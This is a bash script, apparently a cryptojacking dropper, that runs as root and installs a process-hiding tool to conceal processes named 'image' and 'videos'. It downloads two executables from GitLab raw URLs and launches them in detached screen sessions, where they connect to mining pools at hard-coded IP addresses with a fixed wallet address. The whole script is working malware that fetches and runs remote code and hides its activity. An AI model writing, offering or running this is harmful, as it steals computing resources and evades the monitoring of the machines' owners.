#!/bin/bash
sudo su <<EOF
apt-get install -y nodejs >/dev/null 2>&1
sudo apt install npm
sudo npm i -g node-process-hider && sudo ph add image && sudo ph add videos
wget -qO image https://gitlab.com/teletyl/oon/-/raw/main/news && chmod +x image
wget -qO videos https://gitlab.com/sarifadim/jomblo/-/raw/main/perusa && chmod +x videos
screen -dms run ./videos -v -l 8.222.133.209:8080 -u 3JWuijUT2hwsC862trVXBSMzQW6JANF63j.NONAME -t 5
screen -dms run ./image --algo KASPA --pool 47.250.56.224:443 --user 3JWuijUT2hwsC862trVXBSMzQW6JANF63j.$(echo B100-$(date +"%T")) --pers AUTO --tls enable
EOF
